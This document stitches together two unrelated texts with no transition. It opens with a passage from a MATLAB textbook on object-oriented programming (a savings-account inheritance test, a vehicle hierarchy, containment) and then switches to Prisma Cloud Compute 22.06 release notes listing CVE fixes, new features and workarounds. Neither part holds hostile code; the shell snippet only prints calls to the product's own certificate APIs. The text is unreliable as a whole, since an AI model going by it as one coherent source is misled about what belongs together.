6. deposit(dsa, 500);
7. fprintf('deposit 500 -> %s\n', char(dsa) );
8. allowOverdraft(dsa, true)
9. gets = withdraw(dsa, 3000);
10. fprintf('enable overdraft and try again -> $%8.2f; %s\n', ...
        gets, char(dsa) )
```

In Listing 18.28:

Line 1: Creates a DeluxSavingsAccount object.
Line 2: Uses the parent's deposit and calcInterest methods.
Line 3: Shows the result.
Line 4: Attempts to withdraw $3,000 without overdraft enabled.
Line 5: Shows the result—getting only the balance and an empty account.
Lines 6 and 7: Deposit another $500 and show the account.
Line 8: Enables overdrafts.
Line 9: Tries again for the $3,000.
Line 10: Displays the final result.

Listing 18.29 shows the result of testing the DeluxSavingsAccount class.
```plaintext
Delux Savings Account with $2000.00 with overdraft off
deposit interest -> Delux Savings Account with $2100.00 with overdraft off
try to get 3000 -> $ 2100.00; Delux Savings Account with $0.00 with overdraft off
deposit 500 -> Delux Savings Account with $500.00 with overdraft off
enable overdraft and try again -> $ 3000.00; Delux Savings Account with $-2520.00 with overdraft OK
```

18.5 Practical Example—Vehicle Modeling

It would be wrong to leave this discussion without an example of a more practical application of these techniques. Figure 18.9 illustrates the inheritance hierarchy for a collection of vehicles that might be used, for example, in a traffic simulation.

18.5.1 A Vehicle Hierarchy

To simulate traffic dynamically, every vehicle must be able to be drawn, and to move in accordance with the rules that govern its behavior. Notice that many of the "simpler" actual vehicles do not contain their own move methods. Given a speed and heading for one of these vehicles, the generic vehicle move method can be applied. However, they all contain their own draw methods, because in general, drawing specific objects requires specific behavior in that draw method. The more complex vehicles (a semi pulling a trailer, for example) do have their own move methods, however, because in addition to moving the semi, the trailer must be moved in such a way that it remains attached to the semi. Similarly, a transporter trailer containing other vehicles must move all the other vehicles in a manner consistent with their remaining on the trailer.

18.5.2 The Containment Relationship

There is one other consideration to note. Any practical hierarchy actually reflects two different relationships between classes. We discussed the inheritance (IS-A) relationship in the previous paragraphs—it is all about inheriting data and methods from a parent class, and is implemented in the child constructor.
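The move/draw scheme just described can be sketched as a simulation loop. This is a sketch only: the class names, constructors, time step, and return-value style are assumptions for illustration, not code from Figure 18.9:

```matlab
% Sketch only -- Car and Semi stand in for classes from the vehicle hierarchy.
vehicles = { Car(30, 90), Semi(20, 180) };   % hypothetical (speed, heading)
dt = 0.1;                                    % simulation time step
for k = 1:length(vehicles)
    v = vehicles{k};
    v = move(v, dt);    % generic @Vehicle\move unless the class redefines it
    draw(v);            % every class supplies its own draw method
    vehicles{k} = v;    % store the moved vehicle back into the collection
end
```

The loop never tests what kind of vehicle it holds; dispatch selects the generic or redefined method for each object.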
Now we illustrate the other relationship—that of containment (HAS-A), used to indicate a relationship of possession between objects. Two examples follow: 1. A semi class has a trailer attached. There is no inheritance of data or methods between the semi and trailer classes. Rather, one of the attributes peculiar to the semi is a trailer object—that attribute can be accessed by set and get methods, permitting the semi to move and draw its trailer. 2. A transporter contains a collection of vehicles. Its move and draw methods must be able to traverse that collection, calling the move or draw methods for the children as appropriate. --- **Chapter Summary** This chapter presented the object-oriented paradigm, including class categories and MATLAB implementations: - Fundamentals of Object-Oriented Programming (OOP) - How MATLAB implements OOP - Examples of inheritance and polymorphism - An example of vehicle modeling
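As a closing sketch, the HAS-A relationship of Section 18.5.2 amounts to storing one object as an ordinary attribute of another. The class and field names here are hypothetical:

```matlab
% Sketch only -- a Semi that HAS-A Trailer (old-style MATLAB classes).
function sm = Semi(speed, trl)
% @Semi\Semi constructor: the trailer is contained, not inherited
sm.speed   = speed;
sm.trailer = trl;            % contained object, reachable via get/set methods
sm = class(sm, 'Semi');      % note: no parent object in this class(...) call
```

Contrast this with the IS-A constructors earlier in the chapter (e.g., Listing 18.24), where a parent object is passed as the third argument to class(...).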
Table of Contents

- Prisma Cloud Compute Edition Release Information
- 22.06 Update 7 Release Notes
  - Addressed Issues
- 22.06 Update 6 Release Notes
  - Addressed Issues
- 22.06 Update 5 Release Notes
  - Addressed Issues
- 22.06 Update 4 Release Notes
  - Addressed Issues
- 22.06 Update 3 Release Notes
  - Addressed Issues
  - Upcoming Breaking Changes
- 22.06 Update 2 Release Notes
  - Enhancements
  - Addressed Issues
  - End of Support Notifications
  - Upcoming breaking changes
- 22.06 Update 1 Release Notes
  - Improvements, Fixes, and Performance Enhancements
  - Known Issues
  - End of Support Notifications
- 22.06 Release Notes
  - CVE Coverage Update
  - New Features in the Core Platform
  - New Features in Container Security
  - New Features in Agentless Security
  - New Features in Host Security
  - New Features in Serverless Security
  - New features in Web Application and API Security (WAAS)
  - DISA STIG Scan Findings and Justifications
  - API Changes
  - Addressed Issues
  - End of Support Notifications
  - Supported Host Operating Systems
  - Changes in Existing Behavior
  - Known Issues
  - Upcoming Deprecation Notifications
  - Backward Compatibility for New Features
- Get Help
  - Related Documentation
  - Request Support

Prisma Cloud Compute Edition Release Information

Prisma Cloud Compute Edition secures your hosts, containers, and serverless functions. To view the current operational status of Palo Alto Networks cloud services, see https://status.paloaltonetworks.com/.
Before you begin using Prisma Cloud, make sure you review the following information:

- 22.06 Update 7 Release Notes
- 22.06 Update 6 Release Notes
- 22.06 Update 5 Release Notes
- 22.06 Update 4 Release Notes
- 22.06 Update 3 Release Notes
- 22.06 Update 2 Release Notes
- 22.06 Update 1 Release Notes
- 22.06 Release Notes

22.06 Update 7 Release Notes

The following table provides the release details:

<table> <thead> <tr> <th>Build</th> <th>22.06.234</th> </tr> </thead> <tbody> <tr> <td>Codename</td> <td>Kepler, 22.06 Update 7</td> </tr> <tr> <td>Release date</td> <td>Mar 13, 2023</td> </tr> <tr> <td>Type</td> <td>Maintenance release</td> </tr> <tr> <td>SHA-256 digest</td> <td>f871922e48194c06a6551760a1e4c93ec89f1c22f0f6c1434b0501503266ba83</td> </tr> </tbody> </table>

**Addressed Issues**

- Fixed **CVE-2023-25173** and **CVE-2023-25153** (Severity - Moderate): the containerd package is used in the Prisma Cloud Defender and for Agentless Scanning. To address the vulnerability, upgrade to containerd version v1.6.18 or v1.5.18 as needed.
- Fixed **CVE-2022-27664** (Severity - High): Updated the net module (golang.org/x/net) to version v0.5.0. WAAS deployments were affected if you have HTTP2 applications and have deployed WAAS to inspect HTTP2 traffic. Upgrade your Prisma Cloud console and deployed Defenders if you use WAAS to inspect HTTP2 traffic.

22.06 Update 6 Release Notes

The following table provides the release details:

<table> <thead> <tr> <th>Build</th> <th>22.06.232</th> </tr> </thead> <tbody> <tr> <td>Codename</td> <td>Kepler, 22.06 Update 6</td> </tr> <tr> <td>Release date</td> <td>February 14, 2023</td> </tr> <tr> <td>Type</td> <td>Maintenance release</td> </tr> <tr> <td>SHA-256 digest</td> <td>70df141032c0ac641f74834e835b9c923405d5db56fa77564843c90d9da5e48a</td> </tr> </tbody> </table>

**Addressed Issues**

- The *ubi-minimal* base image's packages are updated to the latest.
- *bits-and-blooms/bloom* Go module is updated to v3.3.1 to fix CVE-2023-0247. - GoLang is updated to version 1.18.9 to fix CVE-2022-41717. 22.06 Update 5 Release Notes The following table provides the release details: <table> <thead> <tr> <th>Build</th> <th>22.06.229</th> </tr> </thead> <tbody> <tr> <td>Codename</td> <td>Kepler, 22.06 Update 5</td> </tr> <tr> <td>Release date</td> <td>Dec 8, 2022</td> </tr> <tr> <td>Type</td> <td>Maintenance release</td> </tr> <tr> <td>SHA-256 digest</td> <td>b1831ebfbaf70c6724b236e219b1ae646cbcc381d42922efa6cbded755345fd2</td> </tr> </tbody> </table> - Addressed Issues - Fixed the CVE-2022-42898 vulnerability found in the krb5-libs package in Red Hat Enterprise Linux (RHEL) 8 for the Prisma Cloud Console and the Defender. 22.06 Update 4 Release Notes The following table provides the release details: <table> <thead> <tr> <th>Build</th> <th>22.06.228</th> </tr> </thead> <tbody> <tr> <td>Codename</td> <td>Kepler, 22.06 Update 4</td> </tr> <tr> <td>Release date</td> <td>Nov 20, 2022</td> </tr> <tr> <td>Type</td> <td>Maintenance release</td> </tr> <tr> <td>SHA-256 digest</td> <td>216ccfd64b8ca66f036b811a6b94cdd38aeb8df34b1fd1af324245ed87bac7db</td> </tr> </tbody> </table> **Addressed Issues** - Addressed the following issues: - CVE-2016-3709, a cross-site scripting (XSS) vulnerability found in the libxml2 package in Red Hat Enterprise Linux. - Fixed an error in the credit usage utilization for WAAS. With this fix, when container/host Defenders are disconnected for 24 hours, the usage of the credit is automatically stopped until the Defenders reconnect. - Fixed an issue where setting the collection scope to more than 6000 collections under runtime policy rules caused a freeze. 
22.06 Update 3 Release Notes The following table provides the release details: <table> <thead> <tr> <th>Build</th> <th>22.06.224</th> </tr> </thead> <tbody> <tr> <td>Codename</td> <td>Kepler, 22.06 Update 3</td> </tr> <tr> <td>Release date</td> <td>Nov 7, 2022</td> </tr> <tr> <td>Type</td> <td>Maintenance release</td> </tr> <tr> <td>SHA-256 digest</td> <td>f0451f05951ab28811f99ebc68adcdf58d17fd332f68290d03eab023d4510495</td> </tr> </tbody> </table> - Addressed Issues - Upcoming Breaking Changes **Addressed Issues** - Fixed an issue with incorrect health state for a Defender deployed on a container. - Addressed the following issues: - CVE-2020-7711 vulnerability detected in a vendor package - `goxmldsig`. - CVE-2022-40674 vulnerability detected in a vendor package - `expat` - CVE-2022-41716 vulnerability detected in Go's handling of Windows environment variables (`os/exec`, `syscall`) - Go update to version 1.18.8. The version includes security fixes. - Improved the reconnection time for multi-tenant deployments when some tenants are disconnected from the central Console. - Fixed a DNS resolution error when running a twistcli image scan with the `--tarball` option. - Fixed an issue where errors were reported in the Google Cloud discovery scan when the scanned service APIs are disabled. Now, when such APIs are disabled on Google Cloud, cloud discovery does not display these as errors in the results; the messages are added to the Console logs instead. - Fixed an issue with incorrect cluster information in image scan results on Monitor > Vulnerabilities > Deployed. - Fixed the rule scope selection for Out-of-Band WAAS rules. When adding a new Out-of-Band WAAS rule, you were unable to choose a container name in the rule scope, or save an Out-of-Band WAAS rule with a scope that included a namespace selection, or did not include an image selection. These issues are now fixed. Upcoming Breaking Changes - Alert Profile—as announced in Kepler Update 2. 
22.06 Update 2 Release Notes The following table provides the release details: <table> <thead> <tr> <th>Build</th> <th>22.06.213</th> </tr> </thead> <tbody> <tr> <td>Codename</td> <td>Kepler, 22.06 Update 2</td> </tr> <tr> <td>Release date</td> <td>Sep 19, 2022</td> </tr> <tr> <td>Type</td> <td>Maintenance release</td> </tr> <tr> <td>SHA-256 digest</td> <td>d780dd3e80152d98f585868e3dd7e5e02e66c5d1d604a4831694e89d9aadabd</td> </tr> </tbody> </table> - Enhancements - Addressed Issues - End of Support Notifications - Upcoming breaking changes Enhancements HTTPS Proxy Support for Agentless Scanning Agentless scanning now supports connections over an HTTPS proxy server. If you use custom certificates for authentication, you can now configure custom certificates for the connection to Console when using agentless scanning. Embed a Defender in a CloudFormation Fargate Task in YAML format Prisma Cloud Compute now supports embedding a Defender in a CloudFormation Fargate task in the YAML format, in addition to the JSON format. Also, Prisma Cloud now supports generating a protected Fargate task definition for a full CloudFormation template that contains other resources besides the task definition itself. Use the Console (Manage > Defenders > Deploy > Defenders) or the APIs (/api/22.06/defenders/fargate.yaml, /api/22.06/defenders/fargate.json) to complete the workflow. Update for CVE-2022-36085 As part of this release, Prisma Cloud has rolled out an update to the vulnerability data stream for CVE-2022-36085. After updating to the enhanced intelligence feed, you may see alerts on vulnerabilities in Prisma Cloud components and Defender images of releases 22.06 Update 1 or older versions. We have determined that Prisma Cloud components are not impacted by these vulnerabilities. There is no risk in continuing to run any of the supported Prisma Cloud releases. To ensure these vulnerability alerts do not display, we recommend upgrading to the latest 22.06 release where applicable. 
If you are not ready to upgrade right away, add an exception in the default Ignore Twistlock Components rule (under Defend > Vulnerabilities > Images > Deployed) to suppress these vulnerability alerts. Support for Additional Orchestrators on x86 Architecture - Google Kubernetes Engine (GKE) version 1.24.2 with containerd version 1.6.6 - Elastic Kubernetes Service (EKS) version 1.23.9 with containerd version 1.6.6 - Azure Kubernetes Service (AKS) version 1.24.3 with containerd version 1.6.4+azure-4 running on Linux - AKS version 1.24.3 running with containerd version 1.6.6+azure on Windows - Lightweight Kubernetes (k3s) version v1.24.4+k3s1 with containerd 1.6.6-k3s1 - OpenShift version 4.11 with CRIO 1.24.1 - Rancher Kubernetes Engine (RKE) version 1.24.4+rke2r1 with containerd 1.6.6-k3s1 Name Update for Cloud Native Network Firewall (CNNF) The Cloud Native Network Firewall (CNNF) is now renamed as Cloud Native Network Segmentation (CNNS). Addressed Issues - Fixed an issue that caused Defender to incorrectly report the Host OS as SLES15SP1 instead of SLES15. - Fixed an internal error that failed to refresh the vulnerability statistics under Monitor > Vulnerabilities > Vulnerability Explorer. - Fixed two issues with Defenders running on containerd/CRI-O nodes: - Defenders attempted to scan host file systems during image scans for containers that changed to the host mount namespace. This issue is fixed. - Defenders attempted to scan the host where the image had a mount point to the host filesystem and some parent directory of the mount point was a symlink. - Fixed an issue that prevented editing WAAS rules. On upgrade to 22.06, it was not possible to update or modify WAAS rules configured to protect the same port at multiple endpoints with different attributes, such as TLS, HTTP2, and gRPC. With this fix, such rules can now be modified. - Fixed the "Missing required VM instance data" error encountered during agentless scanning on Azure. 
Azure hosts with unmanaged operating system disks are skipped during the scan. Agentless scanning doesn't support Azure hosts with an unmanaged operating system disk. - Fixed a high memory usage issue in Linux distributions where CNNF/CNNS was enabled. In addition to upgrading to this release, CNNF/CNNS users are advised to upgrade from a 4.15.x kernel to a 5.4.x or later kernel. End of Support Notifications - With the end of support for Maven system dependencies, Defender injection for Java functions is now implemented using the bundle as a Maven internal repository. With this update, the `<systemPath>` dependency is no longer used. - With the end of support for compile dependency in Gradle 7.0, Defender injection for Java functions is updated to implementation dependency using an internal repository. Upcoming breaking changes On upgrade to the next release, Lagrange, if you have configured an alert profile on Compute > Manage > Alerts and enabled the Image vulnerabilities (registry and deployed) trigger as well as the Immediately alert for deployed resources setting, you will now get immediate alerts for vulnerable registry images along with immediate alerts for deployed images. The volume of immediate alerts that are generated may be much higher than in previous releases because support for immediate alerting for registry images is being added in Lagrange. With this change, the Image vulnerabilities (registry and deployed) option is being separated into two: Deployed images vulnerabilities and Registry images vulnerabilities, and both these triggers will be enabled if the original trigger was enabled in the alert profile. 
22.06 Update 1 Release Notes The following table provides the release details: <table> <thead> <tr> <th>Build</th> <th>22.06.197</th> </tr> </thead> <tbody> <tr> <td>Codename</td> <td>Kepler, 22.06 Update 1</td> </tr> <tr> <td>Release date</td> <td>Jul 27, 2022</td> </tr> <tr> <td>Type</td> <td>Maintenance release</td> </tr> <tr> <td>SHA-256 digest</td> <td>5aa618314e176d03e559e58d2eba50959365cdc145cba99f5d47d90737d233bf</td> </tr> </tbody> </table> Improvements, Fixes, and Performance Enhancements - Added support for more orchestrators: - Google Kubernetes Engine (GKE) version 1.23.7 with containerd version 1.5.11 - GKE version 1.24.1 running on ARM64 architecture. For the full announcement, refer to our blog. - VMware Tanzu Kubernetes Grid Integrated (TKGI) version 1.14 - VMware Tanzu Kubernetes Grid Multicloud (TKGM) version 1.5.1 on Photon 3 and Ubuntu 20.04.03 LTS - Fixed the broken pipe error that occurred while downloading a large image CSV for secondary consoles when using Projects. The error was fixed by extending the HTTP client timeout value. - Fixed the welcome tour screen for new users who don’t have an administrator role. - Fixed an issue where Defenders blocked application deployments on SELinux due to incorrect SELinux labeling on proxy runc. The issue was fixed by applying the original runc’s SELinux label to the created runc proxy binary. - Fixed the validity period error for self-signed certificates. The 365-day limit has been removed, and the validity period can now be any whole number of days greater than or equal to 1. - Fixed an issue where a Defender scanning a non-docker (CRI-O) registry incorrectly reported all custom compliance checks as passed. - Fixed an error that overwrote the communication port after upgrading a Defender with a custom port from the Prisma Cloud Console UI. - Fixed an issue that showed different fixes for the same CVE on a single image. 
Each CVE vulnerability is consolidated and grouped according to OS version for each image and package. - Fixed an issue with a missing runc path in TKGI with containerd. Specify a custom container runtime socket path when deploying Defenders on TKGI with containerd. - Fixed an issue with the scanned images filter. With this fix, the filter lists all the tags when multiple images have the same digest. - Fixed an issue of duplicate or missing system rules for WAAS. - Fixed an issue of unprotected web apps and APIs missing from the report (Monitor > WAAS > Unprotected Web Apps and APIs). - Fixed an issue where XSS was not detected due to query key/value parsing. Known Issues - Defenders are not accepting the self-signed proxy certificate configured for TLS intercept proxies. **Workaround:** Ensure the following conditions are met to work around the issue. - Your proxy trusts the Prisma Cloud Console Certificate Authority (CA). - Your proxy uses the client certificate of the Defender when the proxy sends requests from the Defender to the Console. - You obtained the certificates of the Defender and the Prisma Cloud Console CA. Use the `/api/v1/certs/server-certs.sh` API to obtain the needed files: - The client key of the Defender: `defender-client-key.pem` - The client certificate of the Defender: `defender-client-cert.pem` - The Prisma Cloud Console CA certificate: `ca.pem` - You obtained the password for the client key of the Defender using the `api/v1/certs/service-parameter` API. 
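For reference, the two API calls from the workaround above could be invoked along these lines. The Console address and credentials are hypothetical placeholders, and the script only builds and prints the commands so you can review them before running anything against your own Console:

```shell
#!/bin/sh
# Hypothetical placeholders -- substitute your Console address and API credentials.
CONSOLE="https://console.example.com:8083"
AUTH="admin:password"

# Fetch the bundle containing the Defender client key/certificate and the Console CA
# certificate, via the /api/v1/certs/server-certs.sh endpoint named in the workaround.
CERTS_CMD="curl -s -k -u ${AUTH} ${CONSOLE}/api/v1/certs/server-certs.sh -o server-certs.sh"

# Retrieve the password for the Defender client key via /api/v1/certs/service-parameter.
PARAM_CMD="curl -s -k -u ${AUTH} ${CONSOLE}/api/v1/certs/service-parameter"

# Printed for review rather than executed in this sketch.
echo "$CERTS_CMD"
echo "$PARAM_CMD"
```

Once you have `defender-client-key.pem`, `defender-client-cert.pem`, and `ca.pem`, configure your proxy to trust the CA certificate and to present the Defender client certificate as described above.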
End of Support Notifications - Debian 9 (Stretch) has reached End of Life (EOL), and users of Debian 9 will not receive any CVE security vulnerability updates from the Intelligence Stream feed associated with this OS version. 22.06 Release Notes The following table provides the release details: <table> <tbody> <tr> <td>Build</td> <td>22.06.179</td> </tr> <tr> <td>Code name</td> <td>Kepler</td> </tr> <tr> <td>Release date</td> <td>June 09, 2022</td> </tr> <tr> <td>Type</td> <td>Major release</td> </tr> <tr> <td>SHA-256 Digest</td> <td>349505f80b50468eb1eab2448a57b43b578bcd57d780b459ea1d6d00803a1091</td> </tr> </tbody> </table> - **CVE Coverage Update** - **New Features in the Core Platform** - **New Features in Container Security** - **New Features in Agentless Security** - **New Features in Host Security** - **New features in Serverless Security** - **New Features in WAAS** - **DISA STIG Scan Findings and Justifications** - **API Changes** - **Addressed Issues** - **Changes in Existing Behavior** - **End of Support Notifications** - **Supported Operating Systems** - **Known Issues** - **Deprecation Notifications** - **Backward Compatibility for New Features** **CVE Coverage Update** As part of the 22.06 release, Prisma Cloud has rolled out updates to its vulnerability data for Common Vulnerabilities and Exposures (CVEs) in the Intelligence Stream. The new additions are as follows: - Support for GitHub Security Advisories vulnerabilities, including Go, Java, and Python vulnerabilities. - A 152% increase in new PRISMA-IDs since the Joule major release. - Faster addition of CVEs (pre-filled CVEs). The pre-filled CVEs were added to the Intelligence Stream an average of 56 days before they were analyzed in the NVD. As an example, the SpringShell CVE (CVE-2022-22965) was published on March 31, 2022, and the NVD analysis was completed on April 8, 2022. 
‘PRISMA-2022-0130’ was published for the vulnerability on March 30, 2022, and was changed to the CVE as soon as it was published in the NVD. New Features in the Core Platform In addition to familiarizing yourself with the new features and enhancements in this release, review the minimum System Requirements for versions that are tested and supported on 22.06. To download the Prisma Cloud Compute Edition release tarball from the Palo Alto Networks Customer Support Portal (CSP): 1. Go to Updates > Software Updates and select Prisma Cloud Compute Edition. New Filters in the Vulnerability Explorer On the Vulnerability Explorer, you can now generate a vulnerabilities report using new filters such as CVSS score and severity threshold. In addition to viewing the filtered results for deployed images, registry images, hosts, and functions under Vulnerability (CVE) results, on Monitor > Vulnerabilities > Vulnerability Explorer, you can also download a detailed report for CVEs in a CSV format or a detailed report for impacted resources in a CSV format from the Vulnerability Explorer. Vulnerability Scan Report for Registry Images With the vulnerabilities report for registry images (Monitor > Vulnerabilities > Images > Registries), you can review the top 10 critical CVEs discovered in your registry images and search by a CVE ID to view the results for both registry and deployed images that are impacted by a CVE. ARM64 Architecture Support You can now deploy Defenders to protect AWS workloads based on the Linux ARM64 architecture. With ARM64 support, you can secure your deployments and enhance the cost savings for compute and network-intensive workloads that use cloud-native compute offerings such as the AWS Graviton processor. To use Prisma Cloud on ARM64 architecture, see the system requirements. Compliance Alert Triggers for Slack You can now trigger and send alerts for container and image compliance, and host compliance issues, to your Slack integration. 
Learn how to configure these new triggers for Slack alerts. Integrate with Azure Active Directory Using SAML 2.0 Prisma Cloud Compute now uses the Microsoft Graph API for integrating with Azure Active Directory (AD) resources. This transition is in line with the deprecation notice from Microsoft of the Azure AD Graph API and the Azure Active Directory Authentication Library (ADAL). For authenticating users on the Prisma Cloud Console, you must replace the Directory.Read.All permission for Azure Active Directory Graph with the Directory.Read.All permission for the Microsoft Graph API. For the correct permissions to use Azure AD with SAML 2.0, see correct permissions. OIDC User Identity Mapping You can map OIDC identities to Prisma Cloud users as required by the specification. Instead of using the default sub attribute, you can now use friendlier attributes, such as email or username. Improvements in Runtime Protection The container model learning is improved to reduce false positive audits when a binary is modified during container creation. The grace time for binaries added after the container has started is now 10 seconds. Additionally, for CI/CD environments where dedicated containers are used to pull images, you can now allow pulling images. For example, if a container was started with podman as one of its startup processes, the Dockerfile will allow this action and ignore runtime audits. Enhanced Coverage for Certificate Authentication with Azure You can now authenticate with Azure using a certificate for the following integrations: - Cloud discovery - Azure Key Vault - ACR registry scanning - Azure serverless function scanning - Azure VM image scanning GKE Autopilot Deployment Improvement When deploying Defenders into your Kubernetes deployment for GKE Autopilot, you have a new toggle in the console and a corresponding twistcli flag that makes the workflow easier. 
The improvements automatically remove the mounts that are not relevant to the Autopilot deployment and enable you to add the annotation required to deploy Defenders successfully. In the Console, go to Manage > Defenders > Deploy > Defenders, select Kubernetes, and enable the Nodes use Container Runtime Interface (CRI), not Docker and GKE Autopilot deployment options. The `--gke-autopilot` flag in twistcli adds the annotation to the YAML file or Helm chart. For example: `./twistcli defender export kubernetes --gke-autopilot --cri --cluster-address <console address> --address https://<console address>:8083` New Features in Container Security Vulnerability and Compliance Scanning for Workloads Protected by App-Embedded Defenders App-Embedded Defenders can now scan the workloads they protect for vulnerabilities and compliance issues. They can also collect and report package information and metadata about the cloud environments in which they run. Go to Monitor > Vulnerabilities > Images > Deployed and Monitor > Compliance > Images > Deployed to review the scan reports. Improved Visibility for CaaS Workloads Protected by App-Embedded Defenders For CaaS (Container as a Service) workloads protected by the App-Embedded Defenders, you can now view more metadata on the cloud environment on which they are deployed, forensics, and runtime audits on the Monitor > Runtime > App-Embedded observations page. You can filter the workloads in the table by a number of facets, including collections, account ID, and clusters. Runtime File System Audits for App-Embedded Defenders App-Embedded Defender runtime defense now includes support for container file systems so that you can continuously monitor and protect containers from suspicious file system activities and malware. 
Automatically Extract Fargate Task Entrypoint at Embed-Time To streamline the embed flow and eliminate manual intervention (that is, updating task definitions to explicitly specify entrypoints), Prisma Cloud can automatically find the image entrypoint and set it up in the protected task definition. Now, when Prisma Cloud generates a protected task definition, it knows the entrypoint and/or cmd instructions of the container image during the first run of the App-Embedded Defender. CloudFormation Template (CFT) Support for Fargate Task Definitions You can now generate protected Fargate task definitions in the CFT format for embedding an App-Embedded Defender. In 22.06, we've added support for more checks from the CIS OpenShift benchmark. For more information, see CIS Benchmarks. Support for Vulnerability and Compliance Scanning for Windows Containers Windows Container Defender on hosts with the containerd runtime can now scan Windows containers for vulnerabilities and compliance issues. This is supported on AKS only. In addition, deployed Windows Container Defenders can now be configured to scan Windows images in registries. twistcli for Windows has also been extended to scan Windows images on Windows hosts with containerd installed. Support for Google Artifact Registry You can now scan Google Artifact Registries using Prisma Cloud Compute. ### Registry Scanning Enhancements Enhanced registry scanning progress status within the Prisma Cloud Console UI and logs. The enhancements provide the option to choose whether to stop or continue an in-progress scan when saving the registry settings. After you configure registry scanning, Prisma Cloud automatically scans the images within for vulnerabilities using an improved flow. ### Scan Image Tar Files with twistcli `twistcli` can scan image tarballs for the Docker Image Specification v1.1 and later. 
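As a rough sketch of the tarball scanning workflow, the twistcli invocation could look like the following. The Console address, user, and tar file name are hypothetical placeholders, and the command is built and echoed rather than executed here:

```shell
#!/bin/sh
# Hypothetical placeholders -- replace with your Console address, user, and image tar file.
CONSOLE="https://console.example.com:8083"
TARBALL="myimage.tar"

# Scan an image tarball (e.g. one produced by `docker save` or built by Kaniko)
# using the --tarball option referenced in these release notes.
SCAN_CMD="./twistcli images scan --address ${CONSOLE} --user admin --tarball ${TARBALL}"

# Printed for review rather than executed in this sketch.
echo "$SCAN_CMD"
```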
This enhancement enables support for vendors who deliver container images as tar files, not via a registry, as well as integration with Kaniko, a tool that builds images in a Kubernetes cluster from a Dockerfile without access to a Docker daemon. Rule to Allow Activity in Attached Sessions When you start a session inside pods or containers running in your deployment using commands such as kubectl exec or docker exec, you can now explicitly specify whether the rule should allow the activity in attached sessions. This option on Defend > Runtime > Container Policy > Add rule > Processes helps you reduce the volume of alerts generated for the allowed activities and processes. When enabled, process, network, and filesystem activity executed in an attached session such as kubectl exec, is explicitly allowed without additional runtime analysis. Only Defender versions 22.06 or later support this capability. New Features in Agentless Security Support for Microsoft Azure Agentless scanning is now available for vulnerability scanning and compliance scanning on Azure. To configure and onboard agentless scanning on Azure, see configure agentless scanning. Support for Google Cloud Agentless scanning is now available for vulnerability scanning and compliance scanning on Google Cloud. To configure and onboard agentless scanning on Google Cloud, see configure agentless scanning. Compliance and Custom Compliance Support With agentless scanning you can now scan hosts from all three major cloud providers—AWS, Azure, and Google Cloud—against compliance benchmarks. In addition to out-of-the-box checks, you can apply user defined custom compliance checks and scan against the host file system. Unpatched OS Detection In addition to vulnerabilities and compliance scanning, you can now track pending OS security updates in this release with agentless scanning. 
Unscanned Cloud Account Detection You can now easily discover regions within AWS, Azure, or Google Cloud accounts where agentless scanning is not enabled, and enable scanning for those cloud accounts. Proxy Support In this release, you can manage how scanners connect to the Prisma Cloud Console for agentless scanning. If you use a proxy, you can configure the proxy settings in the scan settings for accounts under Manage > Cloud Accounts. New Features in Host Security Auto-Defend Host Process Update When you set up the process to automatically deploy Defenders on hosts, this update ensures that Host Defenders are not deployed on container hosts. Hosts running containers require Container Defenders to protect and secure both the host and the containers on it. Learn about the deployment process for auto-defend hosts. CIS Linux Benchmark Update The CIS Linux Benchmark now includes 13 additional checks. You can find the additional controls in the Defend > Compliance > Hosts > CIS Linux template. New Features in Serverless Security Runtime Protection for Azure Functions Serverless Defenders now offer runtime protection for Azure Functions. Functions implemented in C# (.NET Core) 3.1 and 6.0 are supported. New Features in Web Application and API Security (WAAS) **WAAS Out of Band Detection** Out of band is a new mode for deploying Web Application and API Security (WAAS). It enables you to inspect HTTP messages to an application based on a mirror of the traffic, without the need for setting up WAAS as an inline proxy, so that you can receive alerts on malicious requests such as OWASP Top 10 attacks, bot traffic, and API events. It provides you with API discovery and alerting without impacting the flow, availability, or response time of the protected web application. Out of band detection also allows you to extend your WAAS approach: - You can monitor your resources deployed on AWS with VPC traffic mirroring from workloads. 
This option gives you the flexibility to monitor environments without deploying Defenders. - If you have deployed Defenders in your environment, but are not using the WAAS capabilities on Compute, you can mirror traffic for an out of band inspection without requiring any additional configuration. After you configure a custom rule for out of band mode (Defend > WAAS > Out of band), all the detections are applied on a read-only copy of the traffic. You can view the out of band traffic details on Monitor > WAAS > API observations > Out of band observations. OpenAPI Definition File Scanning You can scan OpenAPI 2.X and 3.X definition files in either YAML or JSON formats, and generate a report for any errors or shortcomings, such as structural issues and gaps in adherence to security guidelines and best practices. You can initiate a scan through twistcli, upload a file to the Console, or import a definition file into a WAAS app. The scan reports are available under Monitor > WAAS > API definition scan. Automatic Port Detection of WAAS Applications for Containers or Hosts When you enable the automatic detection of ports in WAAS Container, Host, or Out of band rules, you can secure ports used by unprotected web applications. The automatic detection of ports makes it easier to deploy WAAS at scale because you can protect web applications without knowing which ports are used. Additionally, you can add specific ports to the protected HTTP endpoints within each app in your deployment. Customization of Response Headers You can append or override names and values in the HTTP response headers sent from WAAS-protected applications, for Containers, Hosts, and App-Embedded deployments. WAAS Actions for HTTP Messages that Exceed Body Inspection Limits You can now apply the Alert, Prevent, or Ban WAAS actions for HTTP messages that exceed the body inspection limit and ensure that messages that exceed the inspection limit are not forwarded to the protected application. 
To enforce these limitations, you must have a minimum Defender version of 22.01 (Joule). With custom rules (Defend > WAAS > Out of band), you can apply Disable or Alert actions for HTTP messages that exceed the body inspection limit.

[Screenshot: the HTTP body inspection settings, showing the body inspection size limit (131072 bytes), a warning that increasing the body inspection limit may have an adverse effect on performance and memory consumption, and the Disable, Alert, Prevent, and Ban actions for messages that exceed the limit.]

Attacker IP Addition to a Network List When a WAAS event includes an attacker IP address, you can now directly click a link to add the attacker IP address to an existing or new network list from Monitor > Events > Aggregated WAAS events > Attacker.

[Screenshot: an aggregated WAAS event, showing the alert details (container, image, user agent, host, URL, path, request and response header names, and status code) and the attacker details, including the source IP address that matched a denied subnet and the source country.]

Regex Match in Forensics Message When defining a custom rule, you can now define a regular expression to match for strings and include the matched information in the forensics message. ``` Attack using HTTP %req.http_version matching on the following payload: %regexMatches ``` Defender Compatibility with Custom Rules To make it easier to review and make sure that all Defenders meet the minimum version requirement for a rule, you can now view the minimum Defender version required to use each rule. The Defender version information is displayed in a new column within the custom rules table. WAAS Proxy Error Statistics On Radar > WAAS connectivity monitor you can view WAAS proxy statistics for blocked requests, count of requests when the inspection limit was exceeded, and parsing errors. DISA STIG Scan Findings and Justifications Every release, we perform an SCAP scan of the Prisma Cloud Compute Console and Defender images. The process is based upon the U.S. Air Force’s Platform 1 "Repo One" OpenSCAP scan of the Prisma Cloud Compute images. 
